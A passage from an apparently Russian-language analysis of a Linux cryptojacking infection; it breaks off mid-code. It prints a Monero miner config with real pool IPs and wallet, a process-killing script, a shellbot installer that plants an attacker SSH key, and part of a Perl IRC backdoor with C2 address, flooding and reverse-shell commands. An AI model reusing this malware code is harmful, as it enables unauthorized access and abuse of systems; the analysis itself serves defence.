\u041d\u0430 \u0432\u044b\u0445\u043e\u0434\u0435 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c json \u0442\u0430\u043a\u043e\u0433\u043e \u0432\u0438\u0434\u0430:<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u043d\u0444\u0438\u0433\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"json\">{     &quot;autosave&quot;: true,     &quot;cpu&quot;: true,     &quot;opencl&quot;: false,     &quot;cuda&quot;: false,     &quot;pools&quot;: [         {             &quot;url&quot;: &quot;sdfsdf:3333&quot;         }     ] }<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u044b\u043c \u043a\u043b\u044e\u0447\u043e\u043c \u0434\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 \u0432\u044b\u0431\u0435\u0440\u0435\u043c <code>&quot;pools&quot;<\/code>. \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c. \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u043c<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">strings -n5 anacron | less  <\/code><\/pre>\n<p>  <\/p>\n<p>\u0438 \u043f\u043e\u0438\u0449\u0435\u043c \u0441\u0442\u0440\u043e\u043a\u0443 &quot;pools&quot;.<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0423 \u043d\u0430\u0441 100% \u043f\u043e\u043f\u0430\u0434\u0430\u043d\u0438\u0435 \u043d\u0430 \u0438\u0441\u043a\u043e\u043c\u044b\u0439 \u043a\u043e\u043d\u0444\u0438\u0433<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"json\">{     &quot;api&quot;: {         &quot;id&quot;: null,         &quot;worker-id&quot;: null     },     &quot;http&quot;: {         &quot;enabled&quot;: false,         &quot;host&quot;: &quot;127.0.0.1&quot;,         &quot;port&quot;: 0,         &quot;access-token&quot;: null,         &quot;restricted&quot;: true     },     &quot;autosave&quot;: true,     &quot;version&quot;: 1,     &quot;background&quot;: true,     &quot;colors&quot;: true,     &quot;randomx&quot;: { 
        &quot;init&quot;: -1,         &quot;numa&quot;: true     },     &quot;cpu&quot;: {         &quot;enabled&quot;: true,         &quot;huge-pages&quot;: true,         &quot;hw-aes&quot;: null,         &quot;priority&quot;: null,         &quot;memory-pool&quot;: false,         &quot;max-threads-hint&quot;: 100,         &quot;asm&quot;: true,         &quot;argon2-impl&quot;: null,         &quot;cn\/0&quot;: false,         &quot;cn-lite\/0&quot;: false     },     &quot;opencl&quot;: {         &quot;enabled&quot;: false,         &quot;cache&quot;: true,         &quot;loader&quot;: null,         &quot;platform&quot;: &quot;AMD&quot;,         &quot;cn\/0&quot;: false,         &quot;cn-lite\/0&quot;: false     },     &quot;cuda&quot;: {         &quot;enabled&quot;: false,         &quot;loader&quot;: null,         &quot;nvml&quot;: true,         &quot;cn\/0&quot;: false,         &quot;cn-lite\/0&quot;: false     },     &quot;donate-level&quot;: 0,     &quot;donate-over-proxy&quot;: 0,     &quot;log-file&quot;: null,     &quot;pools&quot;: [         {             &quot;coin&quot;: &quot;monero&quot;,             &quot;algo&quot;: null,             &quot;url&quot;: &quot;debian-package.center:80&quot;,             &quot;user&quot;: &quot;45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ&quot;,             &quot;pass&quot;: &quot;x&quot;,             &quot;tls&quot;: false,             &quot;keepalive&quot;: true,             &quot;nicehash&quot;: true         },         {             &quot;coin&quot;: &quot;monero&quot;,             &quot;algo&quot;: null,             &quot;url&quot;: &quot;45.9.148.125:80&quot;,             &quot;user&quot;: &quot;45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ&quot;,             &quot;pass&quot;: &quot;x&quot;,             &quot;tls&quot;: false,             &quot;keepalive&quot;: true,             &quot;nicehash&quot;: true         },        
 {             &quot;coin&quot;: &quot;monero&quot;,             &quot;algo&quot;: null,             &quot;url&quot;: &quot;45.9.148.129:80&quot;,             &quot;user&quot;: &quot;45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ&quot;,             &quot;pass&quot;: &quot;x&quot;,             &quot;tls&quot;: false,             &quot;keepalive&quot;: true,             &quot;nicehash&quot;: true         }     ],     &quot;print-time&quot;: 60,     &quot;health-print-time&quot;: 60,     &quot;retries&quot;: 5,     &quot;retry-pause&quot;: 5,     &quot;syslog&quot;: false,     &quot;user-agent&quot;: null,     &quot;watch&quot;: true }<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u041c\u0430\u043b\u0432\u0430\u0440\u044c \u043c\u0430\u0439\u043d\u0438\u0442 \u043c\u043e\u043d\u0435\u0440\u043e \u043d\u0430 \u043f\u0443\u043b\u0430\u0445 <code>debian-package.center<\/code>, <code>45.9.148.125<\/code>, <code>45.9.148.129<\/code> \u0434\u043b\u044f \u044e\u0437\u0435\u0440\u0430 <code>45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ<\/code> \u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u043c <code>x<\/code>. \u0414\u043e\u043c\u0435\u043d\u043d\u043e\u0435 \u0438\u043c\u044f <code>debian-package.center<\/code> \u0440\u0435\u0437\u043e\u043b\u0432\u0438\u0442\u0441\u044f \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u043f\u043e \u0441\u043f\u0438\u0441\u043a\u0443 ip <code>45.9.148.129<\/code>.<\/p>\n<p>  <\/p>\n<p>\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u043c\u0430\u0439\u043d\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u043a\u0440\u0438\u043f\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 <code>a\/init0<\/code>. 
\u041f\u0435\u0440\u0435\u0434 \u0442\u0435\u043c \u043a\u0430\u043a \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0432\u043e\u044e \u043a\u043e\u043f\u0438\u044e, \u043e\u043d \u0438\u0437\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0442 \u043a\u043e\u043d\u043a\u0443\u0440\u0435\u043d\u0442\u043e\u0432 \u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0437\u0430\u043d\u0438\u043c\u0430\u044e\u0442 \u0431\u043e\u043b\u0435\u0435 60% \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438. \u041f\u043e\u0438\u0441\u043a \u043a\u043e\u043d\u043a\u0443\u0440\u0435\u043d\u0442\u043d\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0441\u043a\u0440\u0438\u043f\u0442 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442 \u043f\u043e \u0438\u043c\u0435\u043d\u0438, \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u043c\u0443 \u043c\u0435\u0441\u0442\u043e\u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044e \u0434\u0440\u0443\u0433\u0438\u0445 \u043c\u0430\u043b\u0432\u0430\u0440\u0435\u0439. \u0418\u043c\u0435\u043d\u0430 \u0438\u0449\u0443\u0442\u0441\u044f \u043f\u043e \u043f\u043e\u0434\u0441\u0442\u0440\u043e\u043a\u0435, \u0438 \u0432 \u0441\u043f\u0438\u0441\u043a\u0435 \u0435\u0441\u0442\u044c \u0448\u0442\u0430\u0442\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b: <code>irqbalance<\/code>, <code>polkitd<\/code>, <code>acpid<\/code>, <code>named<\/code>. 
\u0412 \u0446\u0435\u043b\u043e\u043c, \u044d\u0442\u043e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u0434\u0430\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 &quot;\u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u0430&quot;<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u0438\u043f\u0442 a\/init-0<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">#!\/bin\/sh  ##########################################################################################\\ ### A script for killing cryptocurrecncy miners in a Linux enviornment ### Provided with zero liability (!) ### ### Some of the malware used as sources for this tool: ### https:\/\/pastebin.com\/pxc1sXYZ ### https:\/\/pastebin.com\/jRerGP1u ### SHA256: 2e3e8f980fde5757248e1c72ab8857eb2aea9ef4a37517261a1b013e3dc9e3c4 ##########################################################################################\\  # Killing processes by name, path, arguments and CPU utilization processes(){     killme() {       killall -9 chron-34e2fg;ps wx|awk '\/34e|r\\\/v3|moy5|defunct\/' | awk '{print $1}' | xargs kill -9 &amp; &gt; \/dev\/null &amp;     }      killa() {     what=$1;ps auxw|awk &quot;\/$what\/&quot; |awk '!\/awk\/' | awk '{print $2}'|xargs kill -9&amp;&gt;\/dev\/null&amp;     }      killa 34e2fg     killme      # Killing big CPU     VAR=$(ps uwx|awk '{print $2&quot;:&quot;$3}'| grep -v CPU)     for word in $VAR     do       CPUUSAGE=$(echo $word|awk -F&quot;:&quot; '{print $2}'|awk -F&quot;.&quot; '{ print $1}')       if [ $CPUUSAGE -gt 60 ]; then echo BIG $word; PID=$(echo $word | awk -F&quot;:&quot; '{print $1'});LINE=$(ps uwx | grep $PID);COUNT=$(echo $LINE| grep -P &quot;er\/v5|34e2|Xtmp|wf32N4|moy5Me|ssh&quot;|wc -l);if [ $COUNT -eq 0 ]; then echo KILLING $line; fi;kill $PID;fi;     done      killall \\.Historys     killall 
\\.sshd     killall neptune     killall xm64     killall xm32     killall xmrig     killall \\.xmrig     killall suppoieup      pkill -f sourplum     pkill wnTKYg &amp;&amp; pkill ddg* &amp;&amp; rm -rf \/tmp\/ddg* &amp;&amp; rm -rf \/tmp\/wnTKYg      ps auxf|grep -v grep|grep &quot;mine.moneropool.com&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:8080&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:3333&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;monerohash.com&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;\/tmp\/a7b104c270&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:6666&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:7777&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:443&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;stratum.f2pool.com:8888&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmrpool.eu&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmrig&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmrigDaemon&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmrigMiner&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;\/var\/tmp\/java&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;ddgs&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;qW3xT&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;t00ls.ru&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;\/var\/tmp\/sustes&quot; | awk '{print $2}'|xargs kill -9      ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9     ps auxf|grep named| awk '{print $2}'|xargs kill -9     ps 
auxf|grep kernelcfg| awk '{print $2}'|xargs kill -9     ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9     ps auxf|grep kernelupgrade| awk '{print $2}'|xargs kill -9     ps auxf|grep kernelorg| awk '{print $2}'|xargs kill -9     ps auxf|grep kernelupdates| awk '{print $2}'|xargs kill -9      ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep &quot;\\-c&quot;|xargs kill -9     ps ax|grep -o '.\/[0-9]* -c'| xargs pkill -f      pkill -f \/usr\/bin\/.sshd     pkill -f acpid     pkill -f AnXqV.yam     pkill -f apaceha     pkill -f askdljlqw     pkill -f bashe     pkill -f bashf     pkill -f bashg     pkill -f bashh     pkill -f bashx     pkill -f BI5zj     pkill -f biosetjenkins     pkill -f bonn.sh     pkill -f bonns     pkill -f conn.sh     pkill -f conns     pkill -f cryptonight     pkill -f crypto-pool     pkill -f ddg.2011     pkill -f deamon     pkill -f disk_genius     pkill -f donns     pkill -f Duck.sh     pkill -f gddr     pkill -f Guard.sh     pkill -f i586     pkill -f icb5o     pkill -f ir29xc1     pkill -f irqba2anc1     pkill -f irqba5xnc1     pkill -f irqbalanc1     pkill -f irqbalance     pkill -f irqbnc1     pkill -f JnKihGjn     pkill -f jweri     pkill -f kw.sh     pkill -f kworker34     pkill -f kxjd     pkill -f libapache     pkill -f Loopback     pkill -f lx26     pkill -f mgwsl     pkill -f minerd     pkill -f minergate     pkill -f minexmr     pkill -f mixnerdx     pkill -f mstxmr     pkill -f nanoWatch     pkill -f nopxi     pkill -f NXLAi     pkill -f performedl     pkill -f polkitd     pkill -f pro.sh     pkill -f pythno     pkill -f qW3xT.2     pkill -f sourplum     pkill -f stratum     pkill -f sustes     pkill -f wnTKYg     pkill -f XbashY     pkill -f XJnRj     pkill -f xmrig     pkill -f xmrigDaemon     pkill -f xmrigMiner     pkill -f ysaydh     pkill -f zigw      # crond     ps ax | grep crond | grep -v grep | awk '{print $1}' &gt; \/tmp\/crondpid     while read crondpid     do         if [ $(echo  $(ps 
-p $crondpid -o %cpu | grep -v \\%CPU) | sed -e 's\/\\.[0-9]*\/\/g')  -ge 60 ]         then             kill $crondpid             rm -rf \/var\/tmp\/v3         fi     done &lt; \/tmp\/crondpid     rm \/tmp\/crondpid -f      # sshd     ps ax | grep sshd | grep -v grep | awk '{print $1}' &gt; \/tmp\/ssdpid     while read sshdpid     do         if [ $(echo  $(ps -p $sshdpid -o %cpu | grep -v \\%CPU) | sed -e 's\/\\.[0-9]*\/\/g')  -ge 60 ]         then             kill $sshdpid         fi     done &lt; \/tmp\/ssdpid     rm -f \/tmp\/ssdpid      # syslog     ps ax | grep syslogs | grep -v grep | awk '{print $1}' &gt; \/tmp\/syslogspid     while read syslogpid     do         if [ $(echo  $(ps -p $syslogpid -o %cpu | grep -v \\%CPU) | sed -e 's\/\\.[0-9]*\/\/g')  -ge 60 ]         then             kill  $syslogpid         fi     done &lt; \/tmp\/syslogspid     rm \/tmp\/syslogspid -f          ps x | grep 'b 22'| awk '{print $1,$5}' &gt; .procs          cat .procs | while read line         do          pid=`echo $line | awk '{print $1;}'`         name=`echo $line | awk '{print $2;}'`         #echo $pid $name           if [ $(echo $name | wc -c) -lt &quot;13&quot; ]             then             echo &quot;Found&quot; $pid $name             kill -9 $pid         fi         done          ####################################################          ps x | grep 'd 22'| awk '{print $1,$5}' &gt; .procs          cat .procs | while read line         do          pid=`echo $line | awk '{print $1;}'`         name=`echo $line | awk '{print $2;}'`         #echo $pid $name           if [ $(echo $name | wc -c) -lt &quot;13&quot; ]             then             echo &quot;Found&quot; $pid $name             kill -9 $pid         fi         done  }  # Removing miners by known path IOC files(){     rm \/tmp\/.cron     rm \/tmp\/.main     rm \/tmp\/.yam* -rf     rm -f \/tmp\/irq     rm -f \/tmp\/irq.sh     rm -f \/tmp\/irqbalanc1     rm -rf \/boot\/grub\/deamon &amp;&amp; rm -rf 
\/boot\/grub\/disk_genius     rm -rf \/tmp\/*httpd.conf     rm -rf \/tmp\/*httpd.conf*     rm -rf \/tmp\/*index_bak*     rm -rf \/tmp\/.systemd-private-*     rm -rf \/tmp\/.xm*     rm -rf \/tmp\/a7b104c270     rm -rf \/tmp\/conn     rm -rf \/tmp\/conns     rm -rf \/tmp\/httpd.conf     rm -rf \/tmp\/java*     rm -rf \/tmp\/kworkerds \/bin\/kworkerds \/bin\/config.json \/var\/tmp\/kworkerds \/var\/tmp\/config.json \/usr\/local\/lib\/libjdk.so     rm -rf \/tmp\/qW3xT.2 \/tmp\/ddgs.3013 \/tmp\/ddgs.3012 \/tmp\/wnTKYg \/tmp\/2t3ik     rm -rf \/tmp\/root.sh \/tmp\/pools.txt \/tmp\/libapache \/tmp\/config.json \/tmp\/bashf \/tmp\/bashg \/tmp\/libapache     rm -rf \/tmp\/xm*     rm -rf \/var\/tmp\/java* }  # Killing and blocking miners by network related IOC network(){     # Kill by known ports\/IPs     netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :443 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :23 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :443 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :143 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :2222 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :3389 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs 
kill -9     netstat -anp | grep :6665 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :6667 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :8444 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9 }     files processes network echo &quot;DONE&quot;<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<h3 id=\"shellbot\">\u0428\u0435\u043b\u043b\u0431\u043e\u0442<\/h3>\n<p>  <\/p>\n<p>\u0416\u0438\u0432\u0435\u0442 \u0432 <code>.rsync\/b\/run<\/code> \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u0437 \u0441\u0435\u0431\u044f \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0432 base64 \u0438 \u0441\u0436\u0430\u0442\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440-\u0441\u043a\u0440\u0438\u043f\u0442 \u043d\u0430 perl, \u043f\u043e\u0445\u043e\u0436\u0438\u0439 \u043d\u0430 <a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/perl-based-shellbot-looks-to-target-organizations-via-cc\/\">\u044d\u0442\u043e\u0442 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440<\/a>. 
\u041e\u043d \u0442\u0430\u043a \u0436\u0435 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 ssh \u043a\u043b\u044e\u0447 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0434\u043b\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430 \u0448\u0435\u043b\u043b\u0431\u043e\u0442\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">#!\/bin\/sh nohup .\/stop&gt;&gt;\/dev\/null &amp; sleep 5 echo &quot;&lt;base64&gt;&quot; | base64 --decode | perl cd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo &quot;ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2\/9p7+vD0EpZ3Tz\/+0kX34uAx1RV\/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr&quot;&gt;&gt;.ssh\/authorized_keys &amp;&amp; chmod -R go= ~\/.ssh<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0427\u0430\u0441\u0442\u044c \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430 perl<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"perl\">my $processo = 'rsync';  $servidor='45.9.148.125' unless $servidor; my $porta='443';  my $VERSAO = '0.2a';  sub parse {    my $servarg = shift;    if ($servarg 
=~ \/^PING \\:(.*)\/) {      sendraw(&quot;PONG :$1&quot;);    } elsif ($servarg =~ \/^\\:(.+?)\\!(.+?)\\@(.+?) PRIVMSG (.+?) \\:(.+)\/) {        my $pn=$1; my $onde = $4; my $args = $5;        if ($args =~ \/^\\001VERSION\\001$\/) {          notice(&quot;$pn&quot;, &quot;\\001VERSION mIRC v6.16 ENE ALIN GABRIEL\\001&quot;);        }        elsif ($args =~ \/^\\001PING\\s+(\\d+)\\001$\/) {          notice(&quot;$pn&quot;, &quot;\\001PONG\\001&quot;);        }        elsif (grep {$_ =~ \/^\\Q$pn\\E$\/i } @adms) {          if ($onde eq &quot;$meunick&quot;){            shell(&quot;$pn&quot;, &quot;$args&quot;);            }          elsif ($args =~ \/^(\\Q$meunick\\E|\\Q$prefixo\\E)\\s+(.*)\/ ) {             my $natrix = $1;             my $arg = $2;             if ($arg =~ \/^\\!(.*)\/) {               ircase(&quot;$pn&quot;,&quot;$onde&quot;,&quot;$1&quot;) unless ($natrix eq &quot;$prefixo&quot; and $arg =~ \/^\\!nick\/);             } elsif ($arg =~ \/^\\@(.*)\/) {                 $ondep = $onde;                 $ondep = $pn if $onde eq $meunick;                 bfunc(&quot;$ondep&quot;,&quot;$1&quot;);             } else {                 shell(&quot;$onde&quot;, &quot;$arg&quot;);             }          }        }    } elsif ($servarg =~ \/^\\:(.+?)\\!(.+?)\\@(.+?)\\s+NICK\\s+\\:(\\S+)\/i) {        if (lc($1) eq lc($meunick)) {          $meunick=$4;          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;        }    } elsif ($servarg =~ m\/^\\:(.+?)\\s+433\/i) {        $meunick = getnick();        nick(&quot;$meunick&quot;);    } elsif ($servarg =~ m\/^\\:(.+?)\\s+001\\s+(\\S+)\\s\/i) {        $meunick = $2;        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;        $irc_servers{$IRC_cur_socket}{'nome'} = &quot;$1&quot;;        foreach my $canal (@canais) {          sendraw(&quot;JOIN $canal&quot;);        }    } }  sub bfunc {   my $printl = $_[0];   my $funcarg = $_[1];   if (my $pid = fork) {      waitpid($pid, 0);   } else {       if (fork) {        
  exit;        } else {            if ($funcarg =~ \/^portscan (.*)\/) {              my $hostip=&quot;$1&quot;;              my @portas=(&quot;21&quot;,&quot;22&quot;,&quot;23&quot;,&quot;25&quot;,&quot;53&quot;,&quot;80&quot;,&quot;110&quot;,&quot;143&quot;,&quot;6665&quot;);              my (@aberta, %porta_banner);              ....            }             elsif ($funcarg =~ \/^download\\s+(.*)\\s+(.*)\/) {             getstore(&quot;$1&quot;, &quot;$2&quot;);             sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :Download de $2 ($1) Conclu.do!&quot;) if ($estatisticas);             }             elsif ($funcarg =~ \/^fullportscan\\s+(.*)\\s+(\\d+)\\s+(\\d+)\/) {              my $hostname=&quot;$1&quot;;              my $portainicial = &quot;$2&quot;;              my $portafinal = &quot;$3&quot;;              my (@abertas, %porta_banner);              ...             }              elsif ($funcarg =~ \/^udp\\s+(.*)\\s+(\\d+)\\s+(\\d+)\/) {               return unless $pacotes;               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);               my $alvo=inet_aton(&quot;$1&quot;);               my $porta = &quot;$2&quot;;               my $tempo = &quot;$3&quot;;               my $pacote;               my $pacotese;               my $fim = time + $tempo;               my $pacota = 1;               ...             }              elsif ($funcarg =~ \/^udpfaixa\\s+(.*)\\s+(\\d+)\\s+(\\d+)\/) {               return unless $pacotes;               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);               my $faixaip=&quot;$1&quot;;               my $porta = &quot;$2&quot;;               my $tempo = &quot;$3&quot;;               my $pacote;               my $pacotes;               my $fim = time + $tempo;               my $pacota = 1;               my $alvo;               ...               
if ($estatisticas)               {                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Tempo de Pacotes\\002: $tempo&quot;.&quot;s&quot;);                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Total de Pacotes\\002: $pacotese&quot;);                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Alvo dos Pacotes\\002: $alvo&quot;);               }             }              elsif ($funcarg =~ \/^conback\\s+(.*)\\s+(\\d+)\/) {               my $host = &quot;$1&quot;;               my $porta = &quot;$2&quot;;               my $proto = getprotobyname('tcp');               my $iaddr = inet_aton($host);               my $paddr = sockaddr_in($porta, $iaddr);               my $shell = &quot;\/bin\/sh -i&quot;;               if ($^O eq &quot;MSWin32&quot;) {                 $shell = &quot;cmd.exe&quot;;               }               ...                if ($estatisticas)               {                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Conectando-se em\\002: $host:$porta&quot;);               }             }             elsif ($funcarg =~ \/^oldpack\\s+(.*)\\s+(\\d+)\\s+(\\d+)\/) {             return unless $pacotes;              my ($dtime, %pacotes) = attacker(&quot;$1&quot;, &quot;$2&quot;, &quot;$3&quot;);              $dtime = 1 if $dtime == 0;              my %bytes;              $bytes{igmp} = $2 * $pacotes{igmp};              $bytes{icmp} = $2 * $pacotes{icmp};              $bytes{o} = $2 * $pacotes{o};              $bytes{udp} = $2 * $pacotes{udp};              $bytes{tcp} = $2 * $pacotes{tcp};              unless ($estatisticas)              {                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002 - Status -\\002&quot;);                sendraw($IRC_cur_socket, 